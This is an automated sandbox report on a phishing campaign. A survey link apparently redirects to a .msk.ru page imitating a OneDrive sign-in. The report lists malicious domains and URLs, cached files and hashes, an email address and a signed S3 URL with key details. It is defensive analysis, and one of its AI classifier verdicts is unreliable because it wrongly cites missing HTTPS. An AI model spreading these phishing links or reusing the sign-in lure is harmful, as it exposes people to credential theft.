a.nel.cloudflare.com	35.190.80.1	true	false		unknown
s3.amazonaws.com	3.5.12.130	true	false		unknown
code.jquery.com	151.101.2.137	true	false		unknown
muj5y37wadgmdjwugqfepukxo40dfqeb.lambda-url.ap-southeast-1.on.aws	54.179.241.115	true	false		unknown
cdnjs.cloudflare.com	104.17.25.14	true	false		unknown
prod-micro.surveysensum.com	18.143.72.65	true	false		unknown
challenges.cloudflare.com	104.18.95.41	true	false		unknown
www.google.com	172.217.18.100	true	false		unknown
s3-r-w.ap-southeast-1.amazonaws.com	52.219.184.2	true	false		unknown
quantumradius.msk.ru	104.21.24.207	true	true		unknown
cx.surveysensum.com	3.85.221.5	true	true		unknown
public-neurosensum-production-storage.s3.ap-southeast-1.amazonaws.com	unknown	unknown	false		unknown
neurosensum-production-storage.s3.ap-southeast-1.amazonaws.com	unknown	unknown	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://infinitispark.msk.ru/DiuXc/	true		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
54.179.241.115	muj5y37wadgmdjwugqfepukxo40dfqeb.lambda-url.ap-southeast-1.on.aws	United States		16509	AMAZON-02US	false
3.5.148.7	unknown	United States		16509	AMAZON-02US	false
104.21.24.207	quantumradius.msk.ru	United States		13335	CLOUDFLARENETUS	true
52.219.164.11	unknown	United States		16509	AMAZON-02US	false
54.231.194.184	unknown	United States		16509	AMAZON-02US	false
104.21.42.218	infinitispark.msk.ru	United States		13335	CLOUDFLARENETUS	true
151.101.130.137	unknown	United States		54113	FASTLYUS	false
3.85.221.5	cx.surveysensum.com	United States		14618	AMAZON-AESUS	true
52.219.124.35	unknown	United States		16509	AMAZON-02US	false
172.67.210.104	unknown	United States		13335	CLOUDFLARENETUS	false
142.250.186.110	unknown	United States		15169	GOOGLEUS	false
35.190.80.1	a.nel.cloudflare.com	United States		15169	GOOGLEUS	false
142.250.184.206	unknown	United States		15169	GOOGLEUS	false
142.250.185.67	unknown	United States		15169	GOOGLEUS	false
104.17.24.14	unknown	United States		13335	CLOUDFLARENETUS	false
1.1.1.1	unknown	Australia		13335	CLOUDFLARENETUS	false
18.143.72.65	prod-micro.surveysensum.com	United States		16509	AMAZON-02US	false
52.219.184.2	s3-r-w.ap-southeast-1.amazonaws.com	United States		16509	AMAZON-02US	false
3.5.12.130	s3.amazonaws.com	United States		14618	AMAZON-AESUS	false
104.18.95.41	challenges.cloudflare.com	United States		13335	CLOUDFLARENETUS	false
151.101.2.137	code.jquery.com	United States		54113	FASTLYUS	false
239.255.255.250	unknown	Reserved		unknown	unknown	false
142.250.185.195	unknown	United States		15169	GOOGLEUS	false
52.76.11.114	unknown	United States		16509	AMAZON-02US	false
64.233.184.84	unknown	United States		15169	GOOGLEUS	false
172.67.220.202	unknown	United States		13335	CLOUDFLARENETUS	false
104.17.25.14	cdnjs.cloudflare.com	United States		13335	CLOUDFLARENETUS	false
172.217.18.100	www.google.com	United States		15169	GOOGLEUS	false

Private

IP
192.168.2.16

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1501361
Start date and time:	2024-08-29 19:51:35 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsinteractivecookbook.jbs
Sample URL:	https://cx.surveysensum.com/fd3Butxp
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled
Analysis Mode:	stream
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal68.phis.win@17/21@50/242

Warnings

Exclude process from analysis (whitelisted): svchost.exe
Excluded IPs from analysis (whitelisted): 64.233.184.84, 142.250.184.206, 142.250.185.67, 34.104.35.123
Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, clientservices.googleapis.com, clients.l.google.com
Not all processes where analyzed, report is missing behavior information
VT rate limit hit for: https://cx.surveysensum.com/fd3Butxp

LLM Input / Output

Input	Output
URL: https://cx.surveysensum.com/fd3Butxp Model: jbxai

URL: https://cx.surveysensum.com/fd3Butxp Model: jbxai	{ "brand":["OneDrive"], "contains_trigger_text":true, "prominent_button_name":"VIEW DOCUMENT", "text_input_field_labels":["Authenticate using your email credentials"], "pdf_icon_visible":false, "has_visible_captcha":false, "has_urgent_text":false, "has_visible_qrcode":false}

URL: https://cx.surveysensum.com/fd3Butxp Model: jbxai	{ "brand":["c"], "contains_trigger_text":false, "prominent_button_name":"unknown", "text_input_field_labels":["unknown"], "pdf_icon_visible":false, "has_visible_captcha":false, "has_urgent_text":false, "has_visible_qrcode":false}

URL: https://cx.surveysensum.com/fd3Butxp Model: jbxai	{ "phishing_score":10, "brand_name":"OneDrive", "reasons":"The domain 'cx.surveysensum.com' does not match the legitimate domain associated with OneDrive, and the presence of a button labeled 'VIEW DOCUMENT' and a disclaimer about sensitive information suggests that the site is designed to trick users into providing their credentials for malicious purposes."}

URL: https://infinitispark.msk.ru/DiuXc/ Model: jbxai	{ "brand":["CLOUDFLARE"], "contains_trigger_text":false, "prominent_button_name":"unknown", "text_input_field_labels":["unknown"], "pdf_icon_visible":false, "has_visible_captcha":false, "has_urgent_text":false, "has_visible_qrcode":false}

URL: https://infinitispark.msk.ru/DiuXc/ Model: jbxai	{ "brand":["unknown"], "contains_trigger_text":false, "prominent_button_name":"next", "text_input_field_labels":["email, phone, or skype", "no account? create one! can't access your account?"], "pdf_icon_visible":false, "has_visible_captcha":false, "has_urgent_text":false, "has_visible_qrcode":false}

URL: https://infinitispark.msk.ru/DiuXc/ Model: jbxai

URL: https://infinitispark.msk.ru/DiuXc/ Model: jbxai	{ "phishing_score":8, "brand_name":"Infiniti Spark", "reasons":"The domain 'infinitispark.msk.ru' seems to be a legitimate domain for the brand 'Infiniti Spark', but the use of a subdomain '.msk.ru' is unusual. Typically, the top-level domain '.ru' is used for Russian websites, but the subdomain '.msk.ru' is not a common or well-known domain. Additionally, the URL does not have any obvious phishing indicators, but the lack of a secure protocol (HTTPS) and the use of a subdomain raise some suspicions."}

URL: https://infinitispark.msk.ru/DiuXc/ Model: jbxai	{ "brand":["OneDrive"], "contains_trigger_text":false, "prominent_button_name":"Next", "text_input_field_labels":["unknown"], "pdf_icon_visible":false, "has_visible_captcha":false, "has_urgent_text":false, "has_visible_qrcode":false}

URL: https://infinitispark.msk.ru/DiuXc/ Model: jbxai	{ "brand":["OneDrive"], "contains_trigger_text":true, "prominent_button_name":"Sign in", "text_input_field_labels":["Enter password", "Forgot my password"], "pdf_icon_visible":false, "has_visible_captcha":false, "has_urgent_text":false, "has_visible_qrcode":false}

URL: https://infinitispark.msk.ru/DiuXc/ Model: jbxai	{ "brand":["OneDrive"], "contains_trigger_text":false, "prominent_button_name":"Sign in", "text_input_field_labels":["Enter password", "Forgot my password"], "pdf_icon_visible":false, "has_visible_captcha":false, "has_urgent_text":false, "has_visible_qrcode":false}

Created / dropped Files

Chrome Cache Entry: 100

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	downloaded
Size (bytes):	56
Entropy (8bit):	4.476474118254377
Encrypted:	false
SSDEEP:
MD5:	A928B164824C733AB3E5FCD30FD37D71
SHA1:	7588F20B513C095F412483602622BC3ECBEF272F
SHA-256:	7E556FA099E63921B0F561CAD71956C1A68DD3EA319A057F83998D2F42EC5FC6
SHA-512:	D8244B64DA6094CBA31335CBD21104D949D8A61F01DF7765F7B08D05DD0F94AB40485A2184124605CCFD27273A54E6E9C0DA71CAD285C966ABE0886D2894119C
Malicious:	false
Reputation:	unknown
URL:	https://cx.surveysensum.com/version.json?t=1724953923352
Preview:	{"version": "0.2.7", "hash": "main.fe8e4f85a729233f.js"}

Chrome Cache Entry: 104

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 71 x 58, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	61
Entropy (8bit):	4.035372245524405
Encrypted:	false
SSDEEP:
MD5:	DDC55D740E9BE2DB6DFD832C2192C17F
SHA1:	1B15F1BF413A99B5192F977C9BF8E14BDC3C0E16
SHA-256:	32EB03B6F6A773531F7B9D6335F9BA199F71B14E23AB5E72DF66D3D85E058CD7
SHA-512:	4B7D3417F5F8B1042D40A78A56F5F44F1F3605A2B11E11BE2D59C6178A055A9AD276B7F20520C116C4C4C7E76B71828EA3979459447A036079CB47C833E39860
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR...G...:.....mn.W....IDAT.....$.....IEND.B`.

Chrome Cache Entry: 107

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 1 icon, 100x100, 32 bits/pixel
Category:	downloaded
Size (bytes):	41662
Entropy (8bit):	2.988105820023809
Encrypted:	false
SSDEEP:
MD5:	7BF9B045FE886EC2720BFC49B28304C4
SHA1:	920F98D22EB5ED1954F3D6ABF576F729C5563918
SHA-256:	3D5B72BF35F467C7A5E1A717F18AB0BF8E2C086C5B218053879BCD7D6A556421
SHA-512:	488C87A35ECB7573332E6400237B73E500449EFB1B3B64DD4686C8807A445CD8CD02E92829883C310CD8E02C411DD37CB31A08A6D0C73A4F120F3E3013A9314E
Malicious:	false
Reputation:	unknown
URL:	https://cx.surveysensum.com/favicon.ico
Preview:	......dd.... .........(...d......... .....@...#...#.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Chrome Cache Entry: 108

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text
Category:	downloaded
Size (bytes):	196
Entropy (8bit):	5.098952451791238
Encrypted:	false
SSDEEP:
MD5:	62962DAA1B19BBCC2DB10B7BFD531EA6
SHA1:	D64BAE91091EDA6A7532EBEC06AA70893B79E1F8
SHA-256:	80C3FE2AE1062ABF56456F52518BD670F9EC3917B7F85E152B347AC6B6FAF880
SHA-512:	9002A0475FDB38541E78048709006926655C726E93E823B84E2DBF5B53FD539A5342E7266447D23DB0E5528E27A19961B115B180C94F2272FF124C7E5C8304E7
Malicious:	false
Reputation:	unknown
URL:	https://infinitispark.msk.ru/favicon.ico
Preview:	<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.</body></html>.

Chrome Cache Entry: 109

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (47992), with no line terminators
Category:	downloaded
Size (bytes):	47992
Entropy (8bit):	5.605846858683577
Encrypted:	false
SSDEEP:
MD5:	CF3402D7483B127DED4069D651EA4A22
SHA1:	BDE186152457CACF9C35477B5BDDA5BCB56B1F45
SHA-256:	EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
SHA-512:	9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
Malicious:	false
Reputation:	unknown
URL:	https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js
Preview:	!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt\|\|function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create\|\|function(t){var e;return n.prototype=t,e=new n,n.prototype=null

Chrome Cache Entry: 110

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	61
Entropy (8bit):	3.990210155325004
Encrypted:	false
SSDEEP:
MD5:	9246CCA8FC3C00F50035F28E9F6B7F7D
SHA1:	3AA538440F70873B574F40CD793060F53EC17A5D
SHA-256:	C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
SHA-512:	A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR...............s....IDAT.....$.....IEND.B`.

Chrome Cache Entry: 111

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	600
Entropy (8bit):	5.010262277504227
Encrypted:	false
SSDEEP:
MD5:	F44706F9AA72C51C6B37B7862F8D91B5
SHA1:	7191F12E933F5286DCDE192BBBCF453CDE9B8653
SHA-256:	53AD5A32AC764F18280BE97DE91C31202F1BE8A227FB7FB010F1E0519E6922B1
SHA-512:	D58795FCF1E4F9AF74520D401F0911F96F525DAAA65984D6C774A534A395A3863C1E3825E7DF63F54386D8AEDD941C30697EB0B3DC975BC6C748EA03C553CF2A
Malicious:	false
Reputation:	unknown
Preview:	{"Ip":"8.46.123.33","Network":"8.46.123.0/24","Version":"IPv4","City":"New York City","Region":"New York","region_code":"NY","Country":"US","country_name":"United States","country_code":"US","country_code_iso3":"USA","country_capital":"Washington","country_tld":".us","continent_code":"NA","in_eu":false,"Postal":"10069","Latitude":40.778,"Longitude":-73.9884,"Timezone":"America/New_York","utc_offset":"-0400","country_calling_code":"+1","Currency":"USD","currency_name":"Dollar","Languages":"en-US,es-US,haw,fr","country_area":9629091.0,"country_population":327167434,"Asn":"AS3356","Org":"LEVEL3"}

Chrome Cache Entry: 112

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (1091), with no line terminators
Category:	dropped
Size (bytes):	1091
Entropy (8bit):	5.200694360720497
Encrypted:	false
SSDEEP:
MD5:	21E7363031BE0831A965F1C0E4EE5141
SHA1:	5816A995FF61BFDCA0CE635974C86456E0321CEE
SHA-256:	5AB9286AB53749CCE57096B0C4F0CD739573191F1CFE8C82003A80A6A3377BDA
SHA-512:	2980207E86F9EA6DD4F8FBCC55F13F5E10FE7E85958B54596FD43AE51985BA65B1A1EF5E989B3A330E09E7F0CB7CA1D6A6CFFF738BC046F6DE413873FD1AB3FD
Malicious:	false
Reputation:	unknown
Preview:	(()=>{"use strict";var e,_={},p={};function n(e){var a=p[e];if(void 0!==a)return a.exports;var r=p[e]={exports:{}};return _[e].call(r.exports,r,r.exports,n),r.exports}n.m=_,e=[],n.O=(a,r,t,f)=>{if(!r){var c=1/0;for(u=0;u<e.length;u++){for(var[r,t,f]=e[u],o=!0,l=0;l<r.length;l++)(!1&f\|\|c>=f)&&Object.keys(n.O).every(h=>n.O[h](r[l]))?r.splice(l--,1):(o=!1,f<c&&(c=f));if(o){e.splice(u--,1);var s=t();void 0!==s&&(a=s)}}return a}f=f\|\|0;for(var u=e.length;u>0&&e[u-1][2]>f;u--)e[u]=e[u-1];e[u]=[r,t,f]},n.n=e=>{var a=e&&e.__esModule?()=>e.default:()=>e;return n.d(a,{a}),a},n.d=(e,a)=>{for(var r in a)n.o(a,r)&&!n.o(e,r)&&Object.defineProperty(e,r,{enumerable:!0,get:a[r]})},n.o=(e,a)=>Object.prototype.hasOwnProperty.call(e,a),(()=>{var e={666:0};n.O.j=t=>0===e[t];var a=(t,f)=>{var l,s,[u,c,o]=f,v=0;if(u.some(d=>0!==e[d])){for(l in c)n.o(c,l)&&(n.m[l]=c[l]);if(o)var b=o(n)}for(t&&t(f);v<u.length;v++)n.o(e,s=u[v])&&e[s]&&e[s][0](),e[s]=0;return n.O(b)},r=self.webpackChunksurvey_runner=self.webpackC

Chrome Cache Entry: 113

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2049
Entropy (8bit):	5.308234721919824
Encrypted:	false
SSDEEP:
MD5:	42DBF3658A8B6BA4CBEE61615D491E4D
SHA1:	891F10CB3E222A751BB2F9FEFC98F8D9367B7C81
SHA-256:	312BE2C5ED01395531ED85EECEEBFFF9B354FD93333695B5C367E06156B33968
SHA-512:	570C52218923B5569903F876974FB44778819D817F3E8D23A051E2FD9371D4D73BC0F94407BE850D335DF9441BC8FA1682BEB7ABC1DDBE366743977EAE6E1849
Malicious:	false
Reputation:	unknown
Preview:	{"statusCode":200.0,"result":{"subscriptionSettings":null,"surveyBundle":null,"response":{"subscriptionId":"fd24d0a9-3a27-11ef-a721-06c69ead4e6d","language":null,"projectId":"eb327455-4e99-4bdb-a3b7-cff993d5a70e","respondentId":"c72ced6c-e392-4f44-a041-8ee456711029","projectType":2,"answers":{"campId":{"isOrphan":false,"response":["66d0813ba1715c203177f0ea"],"questionId":"__system","isDisplayed":false,"isInLoop":false,"textLength":0,"type":1,"isStarred":false,"numericResponse":null},"distributionChannel":{"isOrphan":false,"response":["1"],"questionId":"__system","isDisplayed":false,"isInLoop":false,"textLength":0,"type":1,"isStarred":false,"numericResponse":null},"vz_c_name":{"isOrphan":false,"response":[],"questionId":"__sample","isDisplayed":false,"isInLoop":false,"textLength":0,"type":4,"isStarred":false,"numericResponse":null}},"surveyFlow":[],"displayedOptions":{},"hiddenOptions":{},"isLive":true,"isAnonymous":true,"hiddenQuestions":[],"currentQuestionId":null,"questionnaireVersio

Chrome Cache Entry: 114

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	downloaded
Size (bytes):	67692
Entropy (8bit):	4.950327052404896
Encrypted:	false
SSDEEP:
MD5:	A532D88DA2A0085B6B0A5135B8BFA642
SHA1:	F75A5490AEF65CC152F111371B997686134AFC4C
SHA-256:	0ED2FF2CF2D10BB2B29B810CEF3635E7828511946675B1E459D46838DDCAB711
SHA-512:	1C0D405E34895865D433C01E54B0FB6B549981BA1643742101BD77D8FD8032F075DC4A1ED6E7BE580F55769FB01151F65882B905EBA04DA103184F786CC77EB8
Malicious:	false
Reputation:	unknown
URL:	https://cx.surveysensum.com/styles.0f838e6e5c73260b.css
Preview:	html,body{font-size:14px;color:#2e384d;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen,Ubuntu,Fira Sans,Droid Sans,Helvetica Neue,sans-serif;font-family:var(--fontFamily);height:100%;background-color:#fff}a:focus,a:hover,a:active{box-shadow:none}:focus{outline:0}:root{--backgroundColor: 216, 218, 211;--backgroundImage: none;--logoUrl: none;--logoPosition: center;--backgroundSize: cover;--backgroundRepeat: repeat;--brightness: .1;--brightnessBgColor: 255, 255, 255;--questionColor: 46, 56, 77;--questionFont: 24px;--answerColor: 0, 82, 204;--anserInvertColor:0, 0, 0;--answerFont: 24px;--buttonColor: 0, 82, 204;--buttonInvertColor: 255, 255, 255;--alpha: .8;--headerColor: 60, 144, 170;--footerColor: 9, 30, 66;--fontFamily:-apple-system, BlinkMacSystemFont, "Segoe UI", "Roboto", "Oxygen", "Ubuntu", "Fira Sans", "Droid Sans", "Helvetica Neue", sans-serif}:host{font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica,Arial,sans-serif,"Apple Color Emoji","Sego

Chrome Cache Entry: 118

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (463), with CRLF line terminators
Category:	dropped
Size (bytes):	7012
Entropy (8bit):	4.70714318809469
Encrypted:	false
SSDEEP:
MD5:	78F633B055F13CBD19F2D151BCE53279
SHA1:	948D40797D42697FB5B16560FD0D49A99FE0A0F7
SHA-256:	3D7709BEA21EB265C86C51B31DC50455CB95CA32F5185CCB5A50DD6BC7E8468A
SHA-512:	2824B1D16F7C4E17C6EE7170C964735A9E617DE1D274DFAD83E8C4AB5E510895B0EA67354E738C2F81110A435BB8DABCA6C8D6ED8A515D0518C12893D992A8DA
Malicious:	false
Reputation:	unknown
Preview:	<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <title>Vintage Muscle Enthusiasts - quantumradius.msk.ru</title>.. <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-EVSTQN3/azprG1Anm3QDgpJLIm9Nao0Yz1ztcQTwFspd3yD65VohhpuuCOmLASjC" crossorigin="anonymous">.. <style>.. body {.. padding-top: 56px;.. background-color: #f8f9fa;.. }.. .hero {.. background: url('https://th.bing.com/th/id/OIP.3lh4NDA4tN86lVsw_kXCqgAAAA') no-repeat center center;.. background-size: cover;.. color: white;.. padding: 150px 0;.. text-align: center;.. }.. .content-section {.. padding: 60px 0;.. }.. .footer {.. background: #343a40;.. color: white;.. padding: 20px 0;..

Chrome Cache Entry: 119

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	downloaded
Size (bytes):	206150
Entropy (8bit):	4.921299337136444
Encrypted:	false
SSDEEP:
MD5:	442403AC2887826929578D2D5A64EF36
SHA1:	699DD82F4B46A9E0DC4B08EB322EE7E63BE1E8C0
SHA-256:	33D12BD319BB67AB71061249772E0D194D90FAD9649B64D177851080B6E1869E
SHA-512:	EA6D1FA6140F2DE5D0D5F5C7BC8D41750D43A0A5CD29036A6243001DF928C63B406CDA047F86EA2D276DD2626B6AD2D290C23B7027B3FD91EA742B5FE6D57331
Malicious:	false
Reputation:	unknown
URL:	https://neurosensum-production-storage.s3.ap-southeast-1.amazonaws.com/vizdom/subscriptions/fd24d0a9-3a27-11ef-a721-06c69ead4e6d/projects/eb327455-4e99-4bdb-a3b7-cff993d5a70e/survey/publish/1/publishSurveyBundleStaticData.json?X-Amz-Expires=1800&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIATHHJ7LJPT5VJLSUA%2F20240829%2Fap-southeast-1%2Fs3%2Faws4_request&X-Amz-Date=20240829T174910Z&X-Amz-SignedHeaders=host&X-Amz-Signature=e5544add8e4cfa7551cd02d4e469fd7a941c0fb2d5236c67b6cfdbc41cc66274
Preview:	{"surveyBundle":{"surveyTitle":"vordonez@cityofanthonynm.org","questionnaireVersion":1,"scriptsData":{},"languageData":{"en":{"text":{"btn_start_survey":"Start Survey","lb_press_enter":"Press <span> Enter</span>","pch_start_typing":"Start typing here...","lb_shift_enter":"SHIFT + ENTER to make a line break","btn_submit":"Submit","btn_next":"Next","pch_choice":"Choice","pch_email_question":"Start typing here...","pch_number_question":"Start typing here...","pch_statement":"Statement","pch_phone_number":"Start typing here...","pch_search_countries":"Search Countries","lb_terminate_default":"<h5>Thank you for taking part in the survey</h5>","err_email":"Enter valid email address","nd_search_country":"No country found","lb_all_apply":"Select all that apply.","err_grid":"Please choose an option for each statement.","err_phone_number":"Enter a valid phone number","mc_range_error":"Please select more choices","mc_range_inst_exact_no_ans":"Choose $<num> choice(s)","mc_range_inst_exact_more_to_

Chrome Cache Entry: 120

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	downloaded
Size (bytes):	2049
Entropy (8bit):	5.31032995350793
Encrypted:	false
SSDEEP:
MD5:	9EF4977ABB81218B69B947E5BF1E6FA2
SHA1:	37519A43001C257FA89796146B0DA36A9F2E85D4
SHA-256:	3C3E7189AE050EEB81530AE1FA287C8EAB104A0C05CE7FF9697C3AE26E68397C
SHA-512:	30B017C551D27A2753439EFA72694F042511EB36327B6B1CE901593730DCEBFC43CCE84434D6D547A0428C183FC133FA8C98DA40294774E185FFB197069F6FA6
Malicious:	false
Reputation:	unknown
URL:	https://prod-micro.surveysensum.com/runnerbundle/api/v2/survey/runnerBundle/fd3Butxp?retryCount=0
Preview:	{"statusCode":200.0,"result":{"subscriptionSettings":null,"surveyBundle":null,"response":{"subscriptionId":"fd24d0a9-3a27-11ef-a721-06c69ead4e6d","language":null,"projectId":"eb327455-4e99-4bdb-a3b7-cff993d5a70e","respondentId":"a415abb7-9ada-49cf-b507-4299a756f0bb","projectType":2,"answers":{"campId":{"isOrphan":false,"response":["66d0813ba1715c203177f0ea"],"questionId":"__system","isDisplayed":false,"isInLoop":false,"textLength":0,"type":1,"isStarred":false,"numericResponse":null},"distributionChannel":{"isOrphan":false,"response":["1"],"questionId":"__system","isDisplayed":false,"isInLoop":false,"textLength":0,"type":1,"isStarred":false,"numericResponse":null},"vz_c_name":{"isOrphan":false,"response":[],"questionId":"__sample","isDisplayed":false,"isInLoop":false,"textLength":0,"type":4,"isStarred":false,"numericResponse":null}},"surveyFlow":[],"displayedOptions":{},"hiddenOptions":{},"isLive":true,"isAnonymous":true,"hiddenQuestions":[],"currentQuestionId":null,"questionnaireVersio

Chrome Cache Entry: 87

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1057)
Category:	downloaded
Size (bytes):	2331
Entropy (8bit):	5.331986909013477
Encrypted:	false
SSDEEP:
MD5:	35529BAF7DD08FF038FA93866C9A71C6
SHA1:	944AD58DFE7E06D89DD1718B9C4D6A90CAE9373E
SHA-256:	E7BAF28527ED2DA31F9339717C43D917F7AB0BBC8B9B510393A670E02F6A758A
SHA-512:	E5B6248DE9C5CF3997B27FB9DBCECFB87CD9DB1B07C9393FD88F710FB4A74739D0B39B0F4E4F5C19E88F761FA0BC2EAE77601F74D82027F7D61918CEE2D8B417
Malicious:	false
Reputation:	unknown
URL:	https://cx.surveysensum.com/fd3Butxp
Preview:	<!DOCTYPE html><html><head>. <meta charset="utf-8">. <meta http-equiv="X-UA-Compatible" content="IE=edge">. <title>SurveySensum \| AI-Enabled Experience Management Platform</title>. <meta name="description" content="SurveySensum is an AI-Enabled Experience Management Platform helps brands to decode customers feedback into actionable insights. Signup free today.">. <meta http-equiv="Cache-Control" content="no-cache, no-store, must-revalidate">. <meta http-equiv="Pragma" content="no-cache">. <meta http-equiv="Expires" content="0">. <base href="/">. <meta name="viewport" content="width=device-width, initial-scale=1">. <link rel="icon" type="image/x-icon" href="favicon.ico">. <script src="https://s3.amazonaws.com/intercom-sheets.com/messenger-sheet-library.latest.js"></script>. <style id="custom-css" type="text/css"></style> -->. This site or product includes IP2Location. Country Flags which available from https://www.ip2location.com. -->.<style>html,body{font-size:

Chrome Cache Entry: 88

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, from Unix, original size modulo 2^32 5153
Category:	dropped
Size (bytes):	2092
Entropy (8bit):	7.908887749623562
Encrypted:	false
SSDEEP:
MD5:	17E5BC57E7E851EA3DFE4E2DFE60E639
SHA1:	68E764197547574110D2681588E2011F4D5422FF
SHA-256:	6A33852D271A606ADF213C4EE9AFAC0C72D4B562F6016814F90D286B507779A9
SHA-512:	96AF9DCC45E99A20EBA8C145BCD7CD110D147CF2C394F67CB502E268B144451BBC6E23A97FECF9AE66D8A945AD4609A2E65090D2578932DBB9785B02F11BBF1A
Malicious:	false
Reputation:	unknown
Preview:	...........X.o...Wla0..V..i.....e..^..9.0.i@K..M&..rb...wG....-.....}..n..Hs)\o..........0..5....2d.......L.c...T:.eA./...O.[=.....[.p..^.<..r"}-.Zq1...`-y....on....\....4.......y....Hw~.1K.`.........;\t...\8Q..8<..\...oN.1..............h?Ky......v....R.;.8..h.8...'.:....Y1.t.?..../-......1$..?.H.....@h......E..Sz.!Ru.H.........MSP"....s.2.j...b/5.....h...n.0.x.q.Z..bbxY...i.....1...U.7.6....J..1.Og...=z....I..<.C...x....oV.cSi.3.s....R....e.R3..E"...21.1..{=.k.A1...O.e.7...0Mo.//NZ~9..\..}s}=...}{;..ay.S....2.\|..~...$#)Y........2....d...lN.zY{z..[G....l.)..:w.+p1.;.S.xc..Y......Z...V........j.n\.J.5....\._Y...V...!...~...z=........^.....B....s~.fL?.%..v..~.Y(.....5.$.#.n..../l...R{m-\.z..K.p[v.-.i[O.`T...r5.L......B.q....kk....\|.F.M.NZ.+#gfo.RF.%]{GX..R..b..q@....BA".v....bH...".1b^......'.....I.r...a.^.A.:ZQ...!..=v'Xzd..""....k...=.-.......L.w$i.-.W.X<I.w....9..)..p.-..55n.[.4pL.n..M....r4......._{....G....$..D.#..&.;..YZ..k..D....j^.D.

Chrome Cache Entry: 92

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65447)
Category:	downloaded
Size (bytes):	89501
Entropy (8bit):	5.289893677458563
Encrypted:	false
SSDEEP:
MD5:	8FB8FEE4FCC3CC86FF6C724154C49C42
SHA1:	B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
